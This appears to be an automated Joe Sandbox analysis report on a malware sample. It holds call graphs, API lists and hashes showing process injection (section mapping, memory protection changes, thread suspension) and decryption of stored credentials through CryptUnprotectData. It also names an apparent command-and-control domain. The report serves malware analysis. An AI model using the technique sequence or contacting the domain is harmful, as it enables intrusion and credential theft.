39576 31e9d44 39575->39576 39577 31e5e60 LdrInitializeThunk 39576->39577 39578 31e9ec9 39577->39578 39952 31e0fca 39955 31fe9a0 39952->39955 39956 31fe9d6 KiUserCallbackDispatcher 39955->39956 39957 31fe9ff DeleteObject 39956->39957 39959 31fea7e SelectObject 39957->39959 39961 31feb1a SelectObject 39959->39961 39962 31feb43 DeleteObject 39961->39962 39964 31e82ca 39965 3204000 LdrInitializeThunk 39964->39965 39967 31e8270 39965->39967 39966 3204000 LdrInitializeThunk 39966->39967 39967->39964 39967->39966 39968 31e0bc6 39969 31e0bf9 39968->39969 39991 31d2a90 39969->39991 39971 31e0ce8 39972 31edeb0 LdrInitializeThunk 39971->39972 39973 31e0cfd 39972->39973 39974 31ee6b0 LdrInitializeThunk 39973->39974 39975 31e0d16 39974->39975 39976 31ee910 LdrInitializeThunk 39975->39976 39977 31e0d32 39976->39977 39978 31f1020 LdrInitializeThunk 39977->39978 39979 31e0d57 39978->39979 39980 31f14d0 LdrInitializeThunk 39979->39980 39981 31e0d60 39980->39981 39982 31fe780 6 API calls 39981->39982 39983 31e0da1 39982->39983 39984 31d2a90 RtlFreeHeap 39983->39984 39985 31edeb0 LdrInitializeThunk 39983->39985 39986 31ee6b0 LdrInitializeThunk 39983->39986 39987 31ee910 LdrInitializeThunk 39983->39987 39988 31f1020 LdrInitializeThunk 39983->39988 39989 31f14d0 LdrInitializeThunk 39983->39989 39990 31fe780 6 API calls 39983->39990 39984->39983 39985->39983 39986->39983 39987->39983 39988->39983 39989->39983 39990->39983 39992 31d2a9e 39991->39992 39993 31d2ba7 39991->39993 39994 31d2b6e 39992->39994 39995 31d2af3 39992->39995 39997 31d2ab3 39992->39997 39994->39995 39996 31d2a90 RtlFreeHeap 39994->39996 40000 3206022 RtlFreeHeap 39995->40000 39996->39994 39997->39993 39997->39995 39998 31d2a90 RtlFreeHeap 39997->39998 39998->39997 40000->39993 39583 31d9240 39586 31d924b 39583->39586 39584 31d924f 39585 31d9294 ExitProcess 39584->39585 39586->39584 39587 31d925a 39586->39587 39595 31da320 39586->39595 39594 31d9265 39587->39594 39590 31d9292 39590->39585 39591 31d9261 39592 31d9284 
39591->39592 39591->39594 39601 31dbe70 FreeLibrary 39592->39601 39602 3207fd0 FreeLibrary 39594->39602 39597 31da336 39595->39597 39596 31da4cf LoadLibraryExW 39600 31da509 39596->39600 39597->39596 39597->39597 39598 31da84d GetProcessVersion 39599 31da50d 39598->39599 39599->39591 39600->39598 39600->39599 39601->39594 39602->39590 39603 31ed140 39604 31ed19f 39603->39604 39605 31ed14c 39603->39605 39605->39605 39606 31ead10 LdrInitializeThunk 39605->39606 39606->39604 39607 3208843 39608 3208870 39607->39608 39608->39608 39609 32088ee 39608->39609 39611 3208120 LdrInitializeThunk 39608->39611 39611->39609 40005 31f40fa 40006 31f4108 40005->40006 40007 320afe0 LdrInitializeThunk 40006->40007 40008 31f41aa 40007->40008 40008->40008 40009 320afe0 LdrInitializeThunk 40008->40009 40009->40008 39616 31e5f75 39617 31e5f7f 39616->39617 39620 320b460 39617->39620 39622 320b493 39620->39622 39621 31e5f91 39623 320b50e 39622->39623 39626 3208120 LdrInitializeThunk 39622->39626 39623->39621 39627 3208120 LdrInitializeThunk 39623->39627 39626->39623 39627->39621 40010 31ef6f2 40011 320b810 LdrInitializeThunk 40010->40011 40012 31ef701 40011->40012 40013 320b810 LdrInitializeThunk 40012->40013 40014 31ef715 40013->40014 40015 31e64f3 40016 31e64f8 40015->40016 40016->40016 40017 320afe0 LdrInitializeThunk 40016->40017 40018 31e666d 40017->40018 39628 31ecb6c 39629 31ecb76 39628->39629 39633 31f0200 39629->39633 39637 31ecd50 39629->39637 39630 31ecbea 39634 31f0360 39633->39634 39635 31f0219 39633->39635 39634->39630 39636 31ead10 LdrInitializeThunk 39635->39636 39636->39634 39638 31ece20 39637->39638 39639 31ecd66 39637->39639 39638->39630 39639->39638 39640 320afe0 LdrInitializeThunk 39639->39640 39641 31ecefd 39640->39641 39644 31ecf3a 39641->39644 39649 3204000 39641->39649 39644->39638 39646 320b460 LdrInitializeThunk 39644->39646 39647 31ecf5c 39646->39647 39647->39638 39652 3208120 LdrInitializeThunk 39647->39652 39650 320afe0 LdrInitializeThunk 39649->39650 39651 
3204022 39650->39651 39652->39638 39653 3208652 39655 320867b 39653->39655 39654 32086ee 39655->39654 39657 3208120 LdrInitializeThunk 39655->39657 39657->39654 40022 31e63eb 40023 31e63f8 40022->40023 40024 320b460 LdrInitializeThunk 40023->40024 40025 31e640a 40024->40025 39662 31f8967 39663 31f89ad 39662->39663 39664 31f8a72 GetPhysicallyInstalledSystemMemory 39663->39664 39665 31f8a97 39664->39665 39665->39665 40030 31e60e2 40032 31e610c 40030->40032 40031 31e617e 40032->40031 40034 3208120 LdrInitializeThunk 40032->40034 40034->40031
                  APIs
                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 02DE0D4F
                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 02DE0DF7
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 02DE116B
                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02DE1220
                  • VirtualProtect.KERNELBASE(?,?,00000008,?,?,?,?,?,?,?), ref: 02DE123D
                  • VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 02DE12E0
                  • VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,?,?,?,?), ref: 02DE1313
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$ProtectSection$View$AllocCreate
                  • String ID:
                  • API String ID: 2664363762-0
                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                  • Instruction ID: b5d1323398dfc4fa876ef22a6136d47da21a631fdb64ff9bc065e763220cdde9
                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                  • Instruction Fuzzy Hash: 7C426A71608341AFDB24EF24C844B6AB7E9EF88714F14492DF99A9B351E770EC44CB92

                  Control-flow Graph

                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  • GetProcAddress.KERNEL32(00000000,s+b), ref: 0062430A
                  • VirtualAlloc.KERNELBASE(A58EE3AB,00052096,-F9A71287,-804A4EE4), ref: 00624986
                    • Part of subcall function 006278C4: _memset.LIBCMT ref: 006278E3
                    • Part of subcall function 0062753D: _memset.LIBCMT ref: 00627557
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset$AddressAllocHandleModuleProcVirtual
                  • String ID: s+b
                  • API String ID: 3046477526-2084237830
                  • Opcode ID: 8f828d79376b00db5bbabbf78764ff0dd1f5e3dd163e5c9372f61affff6fdf5c
                  • Instruction ID: ccdfc19d8b1d5daa0312b355cd2365a3ddcec1ae2178a648247af00193cd209e
                  • Opcode Fuzzy Hash: 8f828d79376b00db5bbabbf78764ff0dd1f5e3dd163e5c9372f61affff6fdf5c
                  • Instruction Fuzzy Hash: 55C249339007224FC798EFB5FCA616E33A3FB82302F42A62DE44297166DF3455458AC9

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 678 623e41-624104 call 628c1f call 6378a8 call 6306f3 call 62c3f7 call 625b40 call 63734e call 63ca86 call 63aa4d call 634395 call 624ddc call 628fe9 call 638b0d call 627ba0 call 63dff8 call 637f2c call 624ddc call 6312e5 call 624fea call 63c189 call 62acac call 63d6eb call 638108 call 624ddc 725 62410f-624d0f call 626de9 call 624ddc call 635706 call 63d6eb call 631e0e call 624ddc * 2 call 62714f call 63565e call 63d6eb call 63d0d8 call 624ddc call 6287a3 call 633219 call 624ddc call 6257d3 call 624ddc call 62d380 call 63b554 call 63d8bd GetProcAddress call 629255 call 639e81 call 62cf9f call 63327c call 63e152 call 63bc81 call 6318f1 call 63387e call 63895a call 621fe4 call 621bb7 call 6296f3 call 621fe4 call 6312e5 call 63a492 call 62de2f call 6324d4 call 6282a7 call 62267e call 632afb call 635706 call 631e0e call 62f76a call 63b554 call 629255 call 635f6b call 62a734 call 63c964 call 638399 call 62ca99 call 62a58e call 6345e8 call 634fb7 call 633f57 call 62a58e call 63d191 call 625762 call 62f393 call 624ddc call 626de9 call 624ddc call 629791 call 62cc3e call 63877d call 624ddc call 6276fb call 63bc81 call 62b822 call 639dbb call 63af20 call 635f6b call 628c1f call 626de9 call 62fdbc call 6276fb call 6277e2 call 63d785 call 638b0d VirtualAlloc call 62da7e call 62f4c1 call 634d2e call 62a58e call 62e49e call 6287a3 call 629255 call 63b92c call 63c964 call 634719 call 629de5 call 624ddc call 626de9 call 63a8b2 call 62a949 call 634cc8 call 63a492 call 63734e call 63e6c4 call 639410 call 627ee1 call 62bf9a call 63b83f call 634b81 call 62b1fa call 62120a call 62cf9f call 638d64 call 6302f9 call 622e9c call 627ee1 call 62a58e call 63dff8 call 627ba0 call 6329b8 678->725 726 62410a call 62f4c1 678->726 953 624d11-624d33 call 6278c4 call 62753d call 6278c4 725->953 954 624d38-624d5d call 627a0d 725->954 726->725 953->954 962 624d79-624d85 954->962 963 624d5f-624d74 call 6278c4 954->963 966 624e14-624e19 962->966 967 624d8b-624db4 
call 62e317 962->967 963->962 968 624e1c-624e27 966->968 974 624db6-624dc7 967->974 975 624dc9-624dd5 967->975 968->968 971 624e29-624e43 call 626c9a 968->971 978 624e53-624e68 971->978 979 624e45-624e4d 971->979 976 624dda-624df0 call 6210f5 call 623e41 974->976 975->976 991 624df3-624dfe 976->991 984 624e6a-624e82 call 62753d 978->984 985 624ebd-624ec7 978->985 979->978 994 624e90-624eb8 call 627a0d call 6278c4 call 6274f3 984->994 995 624e84-624e8b call 6278c4 984->995 987 624ed3-624ee8 call 626056 985->987 988 624ec9-624ece call 6278c4 985->988 1001 624f15-624f2f call 62ed28 987->1001 1002 624eea-624f10 call 62e317 987->1002 988->987 991->991 996 624e00-624e0f call 623e41 991->996 994->985 995->994 996->966 1002->1001
                  APIs
                  • GetProcAddress.KERNEL32(00000000,s+b), ref: 0062430A
                  • VirtualAlloc.KERNELBASE(A58EE3AB,00052096,-F9A71287,-804A4EE4), ref: 00624986
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AddressAllocProcVirtual
                  • String ID: s+b
                  • API String ID: 2770133467-2084237830
                  • Opcode ID: 81c194d84e037b8db3f48b311a342e97e9af4700b57937565eeee7631f211c16
                  • Instruction ID: cdcb939bea94e6d30f2283bec2c5fda38798b018671139d8879209331633adc4
                  • Opcode Fuzzy Hash: 81c194d84e037b8db3f48b311a342e97e9af4700b57937565eeee7631f211c16
                  • Instruction Fuzzy Hash: 0C7225379107224FD799EFB5ECA616E3363FBC2306F46A22DE44287166DF3444468AC9

                  Control-flow Graph

                  • Executed
Control-flow Graph: edge list omitted; API calls named in the graph: GetProcAddress, VirtualAlloc
                  APIs
                  • GetProcAddress.KERNEL32(00000000,s+b), ref: 0062430A
                  • VirtualAlloc.KERNELBASE(A58EE3AB,00052096,-F9A71287,-804A4EE4), ref: 00624986
                    • Part of subcall function 006278C4: _memset.LIBCMT ref: 006278E3
                    • Part of subcall function 0062753D: _memset.LIBCMT ref: 00627557
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset$AddressAllocProcVirtual
                  • String ID: s+b
                  • API String ID: 2209818441-2084237830
                  • Opcode ID: b7b0ef838776a43ef45d350a4612076e952e595f5cd5d980ab373e9b4a5ada2d
                  • Instruction ID: 8072cebca02ffdf8bd29d59e12d35691a1114f9b15f9eebcdf750742111d8737
                  • Opcode Fuzzy Hash: b7b0ef838776a43ef45d350a4612076e952e595f5cd5d980ab373e9b4a5ada2d
                  • Instruction Fuzzy Hash: 1A6239329007228FC798EFB5ECA656E73A3FBC1306F06A62DE44287155DF3459458EC9

                  Control-flow Graph: edge list omitted; API calls named in the graph: CreateToolhelp32Snapshot, Thread32First, Wow64SuspendThread, FindCloseChangeNotification
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02D9071D,?,00000001,?,81EC8B55,000000FF), ref: 02D90C15
                  • Thread32First.KERNEL32(00000000,0000001C), ref: 02D90C41
                  • Wow64SuspendThread.KERNEL32(00000000), ref: 02D90C94
                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02D90CBE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: ChangeCloseCreateFindFirstNotificationSnapshotSuspendThreadThread32Toolhelp32Wow64
                  • String ID:
                  • API String ID: 376097663-0
                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                  • Instruction ID: 0a8cb85a40da39f5987f9d696f75060c16fd6001dbecbc04a4b44d1fcf6dd096
                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                  • Instruction Fuzzy Hash: 3A41ED75A00108AFDB18DFA8D490FADB7F6EF88300F108168E6159B794DB34EE45CB94

                  Control-flow Graph: edge list omitted; only internal calls are named in the graph
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: RMBC$contintnetksows.shop$ISO
                  • API String ID: 0-2621096283
                  • Opcode ID: ad90a8e9bca27d5b074743c408b61d282c6c7059ff90e62dc7c044138fb54429
                  • Instruction ID: 3df96b0031325a5109b9867d61b4b40b8590b0b38a50309f5ac879209c4ff4ac
                  • Opcode Fuzzy Hash: ad90a8e9bca27d5b074743c408b61d282c6c7059ff90e62dc7c044138fb54429
                  • Instruction Fuzzy Hash: 3E42ACB1500B419FD724CF29C985712BBF1FF4A204F18869CE8EA8BB95E334E815CB95

                  Control-flow Graph: edge list omitted; only internal calls are named in the graph
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Object$Select$CallbackDeleteDispatcherUser
                  • String ID: contintnetksows.shop$uw$y{
                  • API String ID: 2657709779-899352108
                  • Opcode ID: 63af5b7c8ed473579d698d31b21df5cd31948e14a4bd99752e6d9d94867a3e28
                  • Instruction ID: fe31c5520e710bc27442e4764f14965186fe23bf80e20abde97db64132b13d2e
                  • Opcode Fuzzy Hash: 63af5b7c8ed473579d698d31b21df5cd31948e14a4bd99752e6d9d94867a3e28
                  • Instruction Fuzzy Hash: 96D14574104B82AFD325CF29C5A0716FBF2BF4A704F18895CD4AA4BB56C336B815CB94
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 02D90B53
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID: ,
                  • API String ID: 2422867632-3772416878
                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                  • Instruction ID: 95e83e816a88bc31f0abe491cca7650f6d7a7aefcca3412fecfee3cc8aa7a175
                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                  • Instruction Fuzzy Hash: CF41C674A00209EFDB04CF98D994BAEB7B1FF88319F208198E5156B390D771AE81CF94
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: )$IEND
                  • API String ID: 0-707183367
                  • Opcode ID: 2209d2ab8b4121cab1ea8523945c1eb9312c966ad4e3570247d75ba94741ba63
                  • Instruction ID: eb3f2871500ce2ed0649ed095e0b82a855a2c22395703423dfe6fa164ae00e60
                  • Opcode Fuzzy Hash: 2209d2ab8b4121cab1ea8523945c1eb9312c966ad4e3570247d75ba94741ba63
                  • Instruction Fuzzy Hash: 2FF1D2B5A087009FD324CF29D85575BBBE1BF9A304F04892DE8D59B381D779E909CB82
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02D9076A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: 1bc6a5954882d22d8f918de821c613969b7efc7e6fd570c8cab578f13679f9b1
                  • Instruction ID: b22b8e946993d022a20d709458ab6102155ed77cdb3cb641c85996536ed3ceae
                  • Opcode Fuzzy Hash: 1bc6a5954882d22d8f918de821c613969b7efc7e6fd570c8cab578f13679f9b1
                  • Instruction Fuzzy Hash: 0B12C2B1E00219DBDB14DF98D990BADBBB2FF48304F2482A9E515AB385C735AE41CF54
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 031E7197
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CryptDataUnprotect
                  • String ID:
                  • API String ID: 834300711-0
                  • Opcode ID: 8e42c208213ec72bc20f65617e291ecc5528d1f37573dcac2caa33f63c3325ba
                  • Instruction ID: 31197f7c52afe0e16117a284dd8f7c82f62415ae5df75cff490036452b1a20b3
                  • Opcode Fuzzy Hash: 8e42c208213ec72bc20f65617e291ecc5528d1f37573dcac2caa33f63c3325ba
                  • Instruction Fuzzy Hash: D751D3B29087818FD724CB28C09162BBBF2AF9A205F184D6DE5D587382E736D945CB42
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: G@AB
                  • API String ID: 2994545307-648899744
                  • Opcode ID: e733b6b45d3334533c985bcc91cef0e7c0d7d3de0bf627d1dc3c09b8a6ea88ab
                  • Instruction ID: 859f654a890a422d11bb9d28a8e5b9853b08337aedd116ac229c69297da74099
                  • Opcode Fuzzy Hash: e733b6b45d3334533c985bcc91cef0e7c0d7d3de0bf627d1dc3c09b8a6ea88ab
                  • Instruction Fuzzy Hash: 23C1DD71A08301EFD314DF68C890B6BB7E2EB99354F29892CE6C58B351E335D845CB92
                  APIs
                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 032080F1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 2383073829ea5ff8ddc2bfb4e642d14e4b03da557fe7884b94536ad8edf543ec
                  • Instruction ID: b1cf8b3fee17b408882cbe6abf956bac6b2985c3223a1299d9b0e49323a77572
                  • Opcode Fuzzy Hash: 2383073829ea5ff8ddc2bfb4e642d14e4b03da557fe7884b94536ad8edf543ec
                  • Instruction Fuzzy Hash: 87110831A193808FD3168F24DC606A5FBB2EF97310B2E459EC5C58B293C2396C1ACB91
                  APIs
                  • RtlAllocateHeap.NTDLL(?,00000000), ref: 03205F26
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: cca9a57287b4f57e5e2a9a37fddf04ced8e2c1941aff39f5858c212d0a0e4914
                  • Instruction ID: 8585ed50d3cda53513e2c1f6f4f025e32c81e242eb10e03fad9211a18a6216a1
                  • Opcode Fuzzy Hash: cca9a57287b4f57e5e2a9a37fddf04ced8e2c1941aff39f5858c212d0a0e4914
                  • Instruction Fuzzy Hash: 37C08C3068820046E10CEB19AD00B32A26E9BE7304F20E10CD5092328AD8B0E802402C
                  APIs
                  • LdrInitializeThunk.NTDLL(0320B17C,?,00000006,00120089,?,00000018,A0A1AEAF,00000000,031E5F3E), ref: 03208146
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                  • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                  • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                  • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: @
                  • API String ID: 2994545307-2766056989
                  • Opcode ID: aff78eb73bff718ecaac5b959fe771bb9abc2926e36f3a66e4f1afb3e10aa60e
                  • Instruction ID: a91f1749179660f906da95eb3b9ff9bc42d28ddc6806e4775b82c8b4c651eb63
                  • Opcode Fuzzy Hash: aff78eb73bff718ecaac5b959fe771bb9abc2926e36f3a66e4f1afb3e10aa60e
                  • Instruction Fuzzy Hash: 9541CFB15183018FD724CF28C881B2BB7F5EF95328F188A2CE4959B292E775D549CB86
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: @
                  • API String ID: 2994545307-2766056989
                  • Opcode ID: 4e24538ab8187c7c80a089f648dd5e6f7626d3fc365c3d5183bbf1edf9b40ad6
                  • Instruction ID: 80088b42e5259c5e0e85af59b0c7def8a7e3a4b79ea4ad7ca7ae96c37c66def7
                  • Opcode Fuzzy Hash: 4e24538ab8187c7c80a089f648dd5e6f7626d3fc365c3d5183bbf1edf9b40ad6
                  • Instruction Fuzzy Hash: 8641F3B19183019FD714CF18C881B6BB7F6FF95314F188A1CE4A58B292E335D558CB82
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID:
                  • API String ID: 2102423945-0
                  • Opcode ID: ddcb5568c7920c9e8d02870415a23d607a7cf6ffec8b9a475cd9f13034464100
                  • Instruction ID: 1fafddd87d3428333240a6b28c834b3d00c6fa4940803c3ae78e5fe07bc09740
                  • Opcode Fuzzy Hash: ddcb5568c7920c9e8d02870415a23d607a7cf6ffec8b9a475cd9f13034464100
                  • Instruction Fuzzy Hash: 9A910832604B218BC728EF78E866AAE77A3BF84301F41492DE49787251DF346945CF95
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 37353a1083d96d80b64e615012713598bfdf07aec51fab7fed05927f9d83fa56
                  • Instruction ID: fe2ebc4700af77377fa9b9c60b3dec1af3430afd842dd6fad37bc46816a70769
                  • Opcode Fuzzy Hash: 37353a1083d96d80b64e615012713598bfdf07aec51fab7fed05927f9d83fa56
                  • Instruction Fuzzy Hash: 85418DB19087108BD724CF68C84162BF3F5FF9A210F99892CE8E997250E736E845C792
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1fc2eed256e92537bac5fd5b8091c2d9439728912e067fb15d4a26daf00d30c
                  • Instruction ID: 5454cb29bb999cd0adc47bb2eba512174f7ae99e0d0f7726c8550c6c309ae400
                  • Opcode Fuzzy Hash: e1fc2eed256e92537bac5fd5b8091c2d9439728912e067fb15d4a26daf00d30c
                  • Instruction Fuzzy Hash: A251DF745087008FD324CF24D851BABB7E8FFC9314F448A1CE8AA5B281D775A901CB92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dc6057c2dec0c11ec337063b5fc8865ba89929e6884a2c2891ac3a1fa0c3f529
